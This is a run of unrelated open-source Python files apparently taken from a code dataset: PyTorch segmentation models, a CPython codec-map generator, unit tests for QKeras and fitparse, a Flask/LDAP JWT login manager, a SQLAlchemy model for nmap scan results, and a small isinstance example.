nn.Upsample(size=upSize, mode='bilinear')
)
def forward(self, x):
return self.features(x)
class ResNetC1(nn.Module):
'''
Segmentation model with ESP as the encoding block.
This is the same as in stage 1
'''
def __init__(self, classes):
super().__init__()
self.level1 = CBR(3, 16, 7, 2) # 384 x 384
self.p01 = PSPDec(16 + classes, classes, 160, 192)
self.p02 = PSPDec(16 + classes, classes, 128, 192)
self.p03 = PSPDec(16 + classes, classes, 96, 192)
self.p04 = PSPDec(16 + classes, classes, 72, 192)
self.class_0 = nn.Sequential(
nn.Conv2d(16 + 5 * classes, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True), # nn.PReLU(classes),
# nn.Dropout2d(.1),
nn.Conv2d(classes, classes, 7, padding=3, bias=False)
)
self.level2 = DownSamplerA(16, 128)
self.level2_0 = DilatedParllelResidualBlockB1(128, 128)
self.level2_1 = DilatedParllelResidualBlockB1(128, 128) # 512 x 256
self.p10 = PSPDec(8 + 256, 64, 80, 96)
self.p20 = PSPDec(8 + 256, 64, 64, 96)
self.p30 = PSPDec(8 + 256, 64, 48, 96)
self.p40 = PSPDec(8 + 256, 64, 36, 96)
self.class_1 = nn.Sequential(
nn.Conv2d(8 + 256 + 64 * 4, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True), # nn.PReLU(classes),
# nn.Dropout2d(.1),
nn.Conv2d(classes, classes, 1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True)
)
self.br_2 = BR(256)
self.level3_0 = DownSamplerA(256, 256)
self.level3_1 = DilatedParllelResidualBlockB1(256, 256, 0.3)
self.level3_2 = DilatedParllelResidualBlockB1(256, 256, 0.3) # 256 x 128
self.level4_1 = DilatedParllelResidualBlockB1(256, 256, 0.3)
self.level4_2 = DilatedParllelResidualBlockB1(256, 256, 0.3)
self.level4_3 = DilatedParllelResidualBlockB1(256, 256, 0.3) # 128 x 64
self.p1 = PSPDec(512, 128, 40)
self.p2 = PSPDec(512, 128, 32)
self.p3 = PSPDec(512, 128, 24)
self.p4 = PSPDec(512, 128, 18)
self.br_4 = BR(512)
self.classifier = nn.Sequential(
nn.Conv2d(512 + 4 * 128, 128, 1, padding=0, bias=False),
nn.BatchNorm2d(128, momentum=0.95, eps=1e-3),
nn.ReLU(True), # nn.PReLU(classes),
# nn.Dropout2d(.1),
nn.Conv2d(128, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True),
nn.Conv2d(classes, classes, 1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True)
)
# C(320, classes, 7, 1)
self.upsample_1 = nn.Upsample(scale_factor=2, mode='bilinear')
self.upsample_2 = nn.Upsample(scale_factor=2, mode='bilinear')
self.upsample_3 = nn.Upsample(scale_factor=2, mode='bilinear')
def forward(self, input1):
# input1 = self.cmlrn(input)
output0 = self.level1(input1)
output1_0 = self.level2(output0)
output1 = self.level2_0(output1_0)
output1 = self.level2_1(output1)
output1 = self.br_2(torch.cat([output1_0, output1], 1))
output2_0 = self.level3_0(output1)
output2 = self.level3_1(output2_0)
output2 = self.level3_2(output2)
output3 = self.level4_1(output2)
output3 = self.level4_2(output3)
output3 = self.level4_3(output3)
output3 = self.br_4(torch.cat([output2_0, output3], 1))
output3 = self.classifier(
torch.cat([output3, self.p1(output3), self.p2(output3), self.p3(output3), self.p4(output3)], 1))
output3 = self.upsample_3(output3)
combine_up_23 = torch.cat([output3, output1], 1)
output23_hook = self.class_1(torch.cat(
[combine_up_23, self.p10(combine_up_23), self.p20(combine_up_23), self.p30(combine_up_23),
self.p40(combine_up_23)], 1))
output23_hook = self.upsample_2(output23_hook)
combine_up = torch.cat([output0, output23_hook], 1)
output0_hook = self.class_0(torch.cat(
[combine_up, self.p01(combine_up), self.p02(combine_up), self.p03(combine_up), self.p04(combine_up)], 1))
# output3 = output2_0 + output3
# classifier = self.classifier(output3)
classifier = self.upsample_1(output0_hook)
return classifier
class ResNetC1_YNet(nn.Module):
'''
Jointly learning the segmentation and classification with ESP as encoding blocks
'''
def __init__(self, classes, diagClasses, segNetFile=None):
super().__init__()
self.level4_0 = DownSamplerA(512, 128)
self.level4_1 = DilatedParllelResidualBlockB1(128, 128, 0.3)
self.level4_2 = DilatedParllelResidualBlockB1(128, 128, 0.3)
self.br_con_4 = BR(256)
self.level5_0 = DownSamplerA(256, 64)
self.level5_1 = DilatedParllelResidualBlockB1(64, 64, 0.3)
self.level5_2 = DilatedParllelResidualBlockB1(64, 64, 0.3)
self.br_con_5 = BR(128)
self.global_Avg = nn.AdaptiveAvgPool2d(1)
self.fc1 = nn.Linear(128, 64)
self.fc2 = nn.Linear(64, diagClasses)
# segmentation model
self.segNet = ResNetC1(classes)
if segNetFile is not None:
print('Loading pre-trained segmentation model')
self.segNet.load_state_dict(torch.load(segNetFile))
self.modules = []
for i, m in enumerate(self.segNet.children()):
self.modules.append(m)
def forward(self, input1):
output0 = self.modules[0](input1)
output1_0 = self.modules[6](output0) # downsample
output1 = self.modules[7](output1_0)
output1 = self.modules[8](output1)
output1 = self.modules[14](torch.cat([output1_0, output1], 1))
output2_0 = self.modules[15](output1) # downsample
output2 = self.modules[16](output2_0)
output2 = self.modules[17](output2)
output3 = self.modules[18](output2)
output3 = self.modules[19](output3)
output3 = self.modules[20](output3)
output3_hook = self.modules[25](torch.cat([output2_0, output3], 1))
output3 = self.modules[26](
torch.cat([output3_hook, self.modules[21](output3_hook), self.modules[22](output3_hook),
self.modules[23](output3_hook), self.modules[24](output3_hook)], 1))
output3 = self.modules[29](output3)
combine_up_23 = torch.cat([output3, output1], 1)
output23_hook = self.modules[13](torch.cat(
[combine_up_23, self.modules[9](combine_up_23), self.modules[10](combine_up_23),
self.modules[11](combine_up_23),
self.modules[12](combine_up_23)], 1))
output23_hook = self.modules[28](output23_hook)
combine_up = torch.cat([output0, output23_hook], 1)
output0_hook = self.modules[5](torch.cat(
[combine_up, self.modules[1](combine_up), self.modules[2](combine_up), self.modules[3](combine_up),
self.modules[4](combine_up)], 1))
# segmentation classsifier
classifier = self.modules[27](output0_hook)
# diagnostic branch
l5_0 = self.level4_0(output3_hook)
l5_1 = self.level4_1(l5_0)
l5_2 = self.level4_2(l5_1)
l5_con = self.br_con_4(torch.cat([l5_0, l5_2], 1))
l6_0 = self.level5_0(l5_con)
l6_1 = self.level5_1(l6_0)
l6_2 = self.level5_2(l6_1)
l6_con = self.br_con_5(torch.cat([l6_0, l6_2], 1))
glbAvg = self.global_Avg(l6_con)
flatten = glbAvg.view(glbAvg.size(0), -1)
fc1 = self.fc1(flatten)
diagClass = self.fc2(fc1)
return classifier, diagClass
class ResNetD1(nn.Module):
'''
Segmentation model with RCB as encoding blocks.
This is the same as in Stage 1
'''
def __init__(self, classes):
super().__init__()
self.level1 = CBR(3, 16, 7, 2) # 384 x 384
self.p01 = PSPDec(16 + classes, classes, 160, 192)
self.p02 = PSPDec(16 + classes, classes, 128, 192)
self.p03 = PSPDec(16 + classes, classes, 96, 192)
self.p04 = PSPDec(16 + classes, classes, 72, 192)
self.class_0 = nn.Sequential(
nn.Conv2d(16 + 5 * classes, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True),
nn.Conv2d(classes, classes, 7, padding=3, bias=False)
)
self.level2 = DownSamplerA(16, 128)
self.level2_0 = BasicResidualBlock(128, 128)
self.level2_1 = BasicResidualBlock(128, 128) # 512 x 256
self.p10 = PSPDec(8 + 256, 64, 80, 96)
self.p20 = PSPDec(8 + 256, 64, 64, 96)
self.p30 = PSPDec(8 + 256, 64, 48, 96)
self.p40 = PSPDec(8 + 256, 64, 36, 96)
self.class_1 = nn.Sequential(
nn.Conv2d(8 + 256 + 64 * 4, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True),
nn.Conv2d(classes, classes, 1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True)
)
self.br_2 = BR(256)
self.level3_0 = DownSamplerA(256, 256)
self.level3_1 = BasicResidualBlock(256, 256, 0.3)
self.level3_2 = BasicResidualBlock(256, 256, 0.3)
self.level4_1 = BasicResidualBlock(256, 256, 0.3)
self.level4_2 = BasicResidualBlock(256, 256, 0.3)
self.level4_3 = BasicResidualBlock(256, 256, 0.3)
self.p1 = PSPDec(512, 128, 40)
self.p2 = PSPDec(512, 128, 32)
self.p3 = PSPDec(512, 128, 24)
self.p4 = PSPDec(512, 128, 18)
self.br_4 = BR(512)
self.classifier = nn.Sequential(
nn.Conv2d(512 + 128 * 4, 128, 1, padding=0, bias=False),
nn.BatchNorm2d(128, momentum=0.95, eps=1e-3),
nn.ReLU(True),
nn.Conv2d(128, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True),
nn.Conv2d(classes, classes, 1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True)
)
self.upsample_1 = nn.Upsample(scale_factor=2, mode='bilinear')
self.upsample_2 = nn.Upsample(scale_factor=2, mode='bilinear')
self.upsample_3 = nn.Upsample(scale_factor=2, mode='bilinear')
def forward(self, input1):
# input1 = self.cmlrn(input)
output0 = self.level1(input1)
output1_0 = self.level2(output0)
output1 = self.level2_0(output1_0)
output1 = self.level2_1(output1)
output1 = self.br_2(torch.cat([output1_0, output1], 1))
output2_0 = self.level3_0(output1)
output2 = self.level3_1(output2_0)
output2 = self.level3_2(output2)
output3 = self.level4_1(output2)
output3 = self.level4_2(output3)
output3 = self.level4_3(output3)
output3 = self.br_4(torch.cat([output2_0, output3], 1))
output3 = self.classifier(
torch.cat([output3, self.p1(output3), self.p2(output3), self.p3(output3), self.p4(output3)], 1))
output3 = self.upsample_3(output3)
combine_up_23 = torch.cat([output3, output1], 1)
output23_hook = self.class_1(torch.cat(
[combine_up_23, self.p10(combine_up_23), self.p20(combine_up_23), self.p30(combine_up_23),
self.p40(combine_up_23)], 1))
output23_hook = self.upsample_2(output23_hook)
combine_up = torch.cat([output23_hook, output0], 1)
output0_hook = self.class_0(torch.cat(
[combine_up, self.p01(combine_up), self.p02(combine_up), self.p03(combine_up), self.p04(combine_up)], 1))
classifier = self.upsample_1(output0_hook)
return classifier
class ResNetD1_YNet(nn.Module):
'''
Jointly learning the segmentation and classification with RCB as encoding blocks
'''
def __init__(self, classes, diagClasses, segNetFile=None):
super().__init__()
self.level4_0 = DownSamplerA(512, 128) # 24x24
self.level4_1 = BasicResidualBlock(128, 128, 0.3)
self.level4_2 = BasicResidualBlock(128, 128, 0.3)
self.br_con_4 = BR(256)
self.level5_0 = DownSamplerA(256, 64) # 12x12
self.level5_1 = BasicResidualBlock(64, 64, 0.3)
self.level5_2 = BasicResidualBlock(64, 64, 0.3)
self.br_con_5 = BR(128)
self.global_Avg = nn.AdaptiveAvgPool2d(1)
self.fc1 = nn.Linear(128, 64)
self.fc2 = nn.Linear(64, diagClasses)
self.segNet = ResNetD1(classes) # 384 x 384
if segNetFile is not None:
print('Loading segmentation pre-trained model')
self.segNet.load_state_dict(torch.load(segNetFile))
self.modules = []
for i, m in enumerate(self.segNet.children()):
self.modules.append(m)
# print(i, m)
def forward(self, input1):
output0 = self.modules[0](input1)
output1_0 = self.modules[6](output0) # downsample
output1 = self.modules[7](output1_0)
output1 = self.modules[8](output1)
output1 = self.modules[14](torch.cat([output1_0, output1], 1))
output2_0 = self.modules[15](output1) # downsample
output2 = self.modules[16](output2_0)
output2 = self.modules[17](output2)
output3 = self.modules[18](output2)
output3 = self.modules[19](output3)
output3 = self.modules[20](output3)
output3_hook = self.modules[25](torch.cat([output2_0, output3], 1))
output3 = self.modules[26](
torch.cat([output3_hook, self.modules[21](output3_hook), self.modules[22](output3_hook),
self.modules[23](output3_hook), self.modules[24](output3_hook)], 1))
output3 = self.modules[29](output3)
combine_up_23 = torch.cat([output3, output1], 1)
output23_hook = self.modules[13](torch.cat(
[combine_up_23, self.modules[9](combine_up_23), self.modules[10](combine_up_23),
self.modules[11](combine_up_23),
self.modules[12](combine_up_23)], 1))
output23_hook = self.modules[28](output23_hook)
combine_up = torch.cat([output0, output23_hook], 1)
output0_hook = self.modules[5](torch.cat(
[combine_up, self.modules[1](combine_up), self.modules[2](combine_up), self.modules[3](combine_up),
self.modules[4](combine_up)], 1))
# segmentation classsifier
classifier = self.modules[27](output0_hook)
# diagnostic branch
l5_0 = self.level4_0(output3_hook)
l5_1 = self.level4_1(l5_0)
l5_2 = self.level4_2(l5_1)
l5_con = self.br_con_4(torch.cat([l5_0, l5_2], 1))
l6_0 = self.level5_0(l5_con)
l6_1 = self.level5_1(l6_0)
l6_2 = self.level5_2(l6_1)
l6_con = self.br_con_5(torch.cat([l6_0, l6_2], 1))
glbAvg = self.global_Avg(l6_con)
flatten = glbAvg.view(glbAvg.size(0), -1)
fc1 = self.fc1(flatten)
diagClass = self.fc2(fc1)
return classifier, diagClass
|
Tools/unicode/genmap_support.py | shawwn/cpython | 52,316 | 30904 | <filename>Tools/unicode/genmap_support.py
#
# genmap_support.py: Multibyte Codec Map Generator
#
# Original Author: <NAME> <<EMAIL>>
# Modified Author: <NAME> <<EMAIL>>
#
class BufferedFiller:
def __init__(self, column=78):
self.column = column
self.buffered = []
self.cline = []
self.clen = 0
self.count = 0
def write(self, *data):
for s in data:
if len(s) > self.column:
raise ValueError("token is too long")
if len(s) + self.clen > self.column:
self.flush()
self.clen += len(s)
self.cline.append(s)
self.count += 1
def flush(self):
if not self.cline:
return
self.buffered.append(''.join(self.cline))
self.clen = 0
del self.cline[:]
def printout(self, fp):
self.flush()
for l in self.buffered:
fp.write(f'{l}\n')
del self.buffered[:]
def __len__(self):
return self.count
class DecodeMapWriter:
filler_class = BufferedFiller
def __init__(self, fp, prefix, decode_map):
self.fp = fp
self.prefix = prefix
self.decode_map = decode_map
self.filler = self.filler_class()
def update_decode_map(self, c1range, c2range, onlymask=(), wide=0):
c2values = range(c2range[0], c2range[1] + 1)
for c1 in range(c1range[0], c1range[1] + 1):
if c1 not in self.decode_map or (onlymask and c1 not in onlymask):
continue
c2map = self.decode_map[c1]
rc2values = [n for n in c2values if n in c2map]
if not rc2values:
continue
c2map[self.prefix] = True
c2map['min'] = rc2values[0]
c2map['max'] = rc2values[-1]
c2map['midx'] = len(self.filler)
for v in range(rc2values[0], rc2values[-1] + 1):
if v in c2map:
self.filler.write('%d,' % c2map[v])
else:
self.filler.write('U,')
def generate(self, wide=False):
if not wide:
self.fp.write(f"static const ucs2_t __{self.prefix}_decmap[{len(self.filler)}] = {{\n")
else:
self.fp.write(f"static const Py_UCS4 __{self.prefix}_decmap[{len(self.filler)}] = {{\n")
self.filler.printout(self.fp)
self.fp.write("};\n\n")
if not wide:
self.fp.write(f"static const struct dbcs_index {self.prefix}_decmap[256] = {{\n")
else:
self.fp.write(f"static const struct widedbcs_index {self.prefix}_decmap[256] = {{\n")
for i in range(256):
if i in self.decode_map and self.prefix in self.decode_map[i]:
m = self.decode_map
prefix = self.prefix
else:
self.filler.write("{", "0,", "0,", "0", "},")
continue
self.filler.write("{", "__%s_decmap" % prefix, "+", "%d" % m[i]['midx'],
",", "%d," % m[i]['min'], "%d" % m[i]['max'], "},")
self.filler.printout(self.fp)
self.fp.write("};\n\n")
class EncodeMapWriter:
filler_class = BufferedFiller
elemtype = 'DBCHAR'
indextype = 'struct unim_index'
def __init__(self, fp, prefix, encode_map):
self.fp = fp
self.prefix = prefix
self.encode_map = encode_map
self.filler = self.filler_class()
def generate(self):
self.buildmap()
self.printmap()
def buildmap(self):
for c1 in range(0, 256):
if c1 not in self.encode_map:
continue
c2map = self.encode_map[c1]
rc2values = [k for k in c2map.keys()]
rc2values.sort()
if not rc2values:
continue
c2map[self.prefix] = True
c2map['min'] = rc2values[0]
c2map['max'] = rc2values[-1]
c2map['midx'] = len(self.filler)
for v in range(rc2values[0], rc2values[-1] + 1):
if v not in c2map:
self.write_nochar()
elif isinstance(c2map[v], int):
self.write_char(c2map[v])
elif isinstance(c2map[v], tuple):
self.write_multic(c2map[v])
else:
raise ValueError
def write_nochar(self):
self.filler.write('N,')
def write_multic(self, point):
self.filler.write('M,')
def write_char(self, point):
self.filler.write(str(point) + ',')
def printmap(self):
self.fp.write(f"static const {self.elemtype} __{self.prefix}_encmap[{len(self.filler)}] = {{\n")
self.filler.printout(self.fp)
self.fp.write("};\n\n")
self.fp.write(f"static const {self.indextype} {self.prefix}_encmap[256] = {{\n")
for i in range(256):
if i in self.encode_map and self.prefix in self.encode_map[i]:
self.filler.write("{", "__%s_encmap" % self.prefix, "+",
"%d" % self.encode_map[i]['midx'], ",",
"%d," % self.encode_map[i]['min'],
"%d" % self.encode_map[i]['max'], "},")
else:
self.filler.write("{", "0,", "0,", "0", "},")
continue
self.filler.printout(self.fp)
self.fp.write("};\n\n")
def open_mapping_file(path, source):
try:
f = open(path)
except IOError:
raise SystemExit(f'{source} is needed')
return f
def print_autogen(fo, source):
fo.write(f'// AUTO-GENERATED FILE FROM {source}: DO NOT EDIT\n')
def loadmap(fo, natcol=0, unicol=1, sbcs=0):
print("Loading from", fo)
fo.seek(0, 0)
decmap = {}
for line in fo:
line = line.split('#', 1)[0].strip()
if not line or len(line.split()) < 2:
continue
row = [eval(e) for e in line.split()]
loc, uni = row[natcol], row[unicol]
if loc >= 0x100 or sbcs:
decmap.setdefault((loc >> 8), {})
decmap[(loc >> 8)][(loc & 0xff)] = uni
return decmap
|
tests/qlayers_test.py | kshithijiyer/qkeras | 388 | 30905 | <reponame>kshithijiyer/qkeras
# Copyright 2019 Google LLC
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test layers from qlayers.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from numpy.testing import assert_allclose
import pytest
import logging
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Activation
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import Input
from tensorflow.keras.models import Model
from tensorflow.keras.backend import clear_session
from qkeras import QActivation
from qkeras import QDense
from qkeras import quantized_bits
from qkeras.utils import model_save_quantized_weights
from qkeras.utils import quantized_model_from_json
def qdense_util(layer_cls,
kwargs=None,
input_data=None,
weight_data=None,
expected_output=None):
"""qlayer test utility."""
input_shape = input_data.shape
input_dtype = input_data.dtype
layer = layer_cls(**kwargs)
x = Input(shape=input_shape[1:], dtype=input_dtype)
y = layer(x)
layer.set_weights(weight_data)
model = Model(x, y)
actual_output = model.predict(input_data)
if expected_output is not None:
assert_allclose(actual_output, expected_output, rtol=1e-4)
@pytest.mark.parametrize(
'layer_kwargs, input_data, weight_data, bias_data, expected_output',
[
(
{
'units': 2,
'use_bias': True,
'kernel_initializer': 'glorot_uniform',
'bias_initializer': 'zeros'
},
np.array([[1, 1, 1, 1]], dtype=K.floatx()),
np.array([[10, 20], [10, 20], [10, 20], [10, 20]],
dtype=K.floatx()), # weight_data
np.array([0, 0], dtype=K.floatx()), # bias
np.array([[40, 80]], dtype=K.floatx())), # expected_output
(
{
'units': 2,
'use_bias': True,
'kernel_initializer': 'glorot_uniform',
'bias_initializer': 'zeros',
'kernel_quantizer': 'quantized_bits(2,0,alpha=1.0)',
'bias_quantizer': 'quantized_bits(2,0)',
},
np.array([[1, 1, 1, 1]], dtype=K.floatx()),
np.array([[10, 20], [10, 20], [10, 20], [10, 20]],
dtype=K.floatx()), # weight_data
np.array([0, 0], dtype=K.floatx()), # bias
np.array([[2, 2]], dtype=K.floatx())), #expected_output
])
def test_qdense(layer_kwargs, input_data, weight_data, bias_data,
expected_output):
qdense_util(
layer_cls=QDense,
kwargs=layer_kwargs,
input_data=input_data,
weight_data=[weight_data, bias_data],
expected_output=expected_output)
if __name__ == '__main__':
pytest.main([__file__])
|
tests/test_records.py | tomfallen/python-fitparse | 548 | 30935 | #!/usr/bin/env python
import sys
from fitparse.records import Crc
if sys.version_info >= (2, 7):
import unittest
else:
import unittest2 as unittest
class RecordsTestCase(unittest.TestCase):
def test_crc(self):
crc = Crc()
self.assertEqual(0, crc.value)
crc.update(b'\x0e\x10\x98\x00(\x00\x00\x00.FIT')
self.assertEqual(0xace7, crc.value)
# 0 must not change the crc
crc.update(0)
self.assertEqual(0xace7, crc.value)
def test_crc_format(self):
self.assertEqual('0x0000', Crc.format(0))
self.assertEqual('0x12AB', Crc.format(0x12AB))
if __name__ == '__main__':
unittest.main()
|
backend/lost/api/user/login_manager.py | JonasGoebel/lost | 490 | 30941 | import datetime
from flask_ldap3_login import LDAP3LoginManager, AuthenticationResponseStatus
from lost.settings import LOST_CONFIG, FLASK_DEBUG
from flask_jwt_extended import create_access_token, create_refresh_token
from lost.db.model import User as DBUser, Group
from lost.db import roles
class LoginManager():
def __init__(self, dbm, user_name, password):
self.dbm = dbm
self.user_name = user_name
self.password = password
def login(self):
if LOST_CONFIG.ldap_config['LDAP_ACTIVE']:
access_token, refresh_token = self.__authenticate_ldap()
else:
access_token, refresh_token = self.__authenticate_flask()
if access_token and refresh_token:
return {
'token': access_token,
'refresh_token': refresh_token
}, 200
return {'message': 'Invalid credentials'}, 401
def __get_token(self, user_id):
expires = datetime.timedelta(minutes=LOST_CONFIG.session_timeout)
expires_refresh = datetime.timedelta(minutes=LOST_CONFIG.session_timeout + 2)
if FLASK_DEBUG:
expires = datetime.timedelta(days=365)
expires_refresh = datetime.timedelta(days=366)
access_token = create_access_token(identity=user_id, fresh=True, expires_delta=expires)
refresh_token = create_refresh_token(user_id, expires_delta=expires_refresh)
return access_token, refresh_token
def __authenticate_flask(self):
if self.user_name:
user = self.dbm.find_user_by_user_name(self.user_name)
if user and user.check_password(self.password):
return self.__get_token(user.idx)
return None, None
def __authenticate_ldap(self):
# auth with ldap
ldap_manager = LDAP3LoginManager()
ldap_manager.init_config(LOST_CONFIG.ldap_config)
# Check if the credentials are correct
response = ldap_manager.authenticate(self.user_name, self.password)
if response.status != AuthenticationResponseStatus.success:
# no user found in ldap, try it with db user:
return self.__authenticate_flask()
user_info = response.user_info
user = self.dbm.find_user_by_user_name(self.user_name)
# user not in db:
if not user:
user = self.__create_db_user(user_info)
else:
# user in db -> synch with ldap
user = self.__update_db_user(user_info, user)
return self.__get_token(user.idx)
def __create_db_user(self, user_info):
user = DBUser(user_name=user_info['uid'], email=user_info['mail'],
email_confirmed_at=datetime.datetime.now(), first_name=user_info['givenName'],
last_name=user_info['sn'], is_external=True)
anno_role = self.dbm.get_role_by_name(roles.ANNOTATOR)
user.roles.append(anno_role)
user.groups.append(Group(name=user.user_name, is_user_default=True))
self.dbm.save_obj(user)
return user
def __update_db_user(self, user_info, user):
user.email = user_info['mail']
user.first_name = user_info['givenName']
user.last_name = user_info['sn']
self.dbm.save_obj(user)
return user |
pipeline/models/nmap_model.py | ponderng/recon-pipeline | 352 | 30971 | <reponame>ponderng/recon-pipeline<filename>pipeline/models/nmap_model.py
import textwrap
from sqlalchemy.orm import relationship
from sqlalchemy import Column, Integer, ForeignKey, String, Boolean
from .base_model import Base
from .port_model import Port
from .ip_address_model import IPAddress
from .nse_model import nse_result_association_table
class NmapResult(Base):
""" Database model that describes the TARGET.nmap scan results.
Represents nmap data.
Relationships:
``target``: many to one -> :class:`pipeline.models.target_model.Target`
``ip_address``: one to one -> :class:`pipeline.models.ip_address_model.IPAddress`
``port``: one to one -> :class:`pipeline.models.port_model.Port`
``nse_results``: one to many -> :class:`pipeline.models.nse_model.NSEResult`
"""
def __str__(self):
return self.pretty()
def pretty(self, commandline=False, nse_results=None):
pad = " "
ip_address = self.ip_address.ipv4_address or self.ip_address.ipv6_address
msg = f"{ip_address} - {self.service}\n"
msg += f"{'=' * (len(ip_address) + len(self.service) + 3)}\n\n"
msg += f"{self.port.protocol} port: {self.port.port_number} - {'open' if self.open else 'closed'} - {self.reason}\n"
msg += f"product: {self.product} :: {self.product_version}\n"
msg += "nse script(s) output:\n"
if nse_results is None:
# add all nse scripts
for nse_result in self.nse_results:
msg += f"{pad}{nse_result.script_id}\n"
msg += textwrap.indent(nse_result.script_output, pad * 2)
msg += "\n"
else:
# filter used, only return those specified
for nse_result in nse_results:
if nse_result in self.nse_results:
msg += f"{pad}{nse_result.script_id}\n"
msg += textwrap.indent(nse_result.script_output, pad * 2)
msg += "\n"
if commandline:
msg += "command used:\n"
msg += f"{pad}{self.commandline}\n"
return msg
__tablename__ = "nmap_result"
id = Column(Integer, primary_key=True)
open = Column(Boolean)
reason = Column(String)
service = Column(String)
product = Column(String)
commandline = Column(String)
product_version = Column(String)
port = relationship(Port)
port_id = Column(Integer, ForeignKey("port.id"))
ip_address = relationship(IPAddress)
ip_address_id = Column(Integer, ForeignKey("ip_address.id"))
target_id = Column(Integer, ForeignKey("target.id"))
target = relationship("Target", back_populates="nmap_results")
nse_results = relationship("NSEResult", secondary=nse_result_association_table, back_populates="nmap_results")
|
examples/isinstance.py | quynhanh-ngx/pytago | 206 | 30972 | def main():
a = ["a", 1, "5", 2.3, 1.2j]
some_condition = True
for x in a:
# If it's all isinstance, we can use a type switch
if isinstance(x, (str, float)):
print("String or float!")
elif isinstance(x, int):
print("Integer!")
else:
print("Dunno!")
print(":)")
# If it's got mixed expressions, we will inline a switch for the isinstance expression
if isinstance(x, str) and some_condition:
print("String")
elif isinstance(x, int):
print("Integer!")
else:
print("Dunno!!")
print(":O")
if __name__ == '__main__':
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.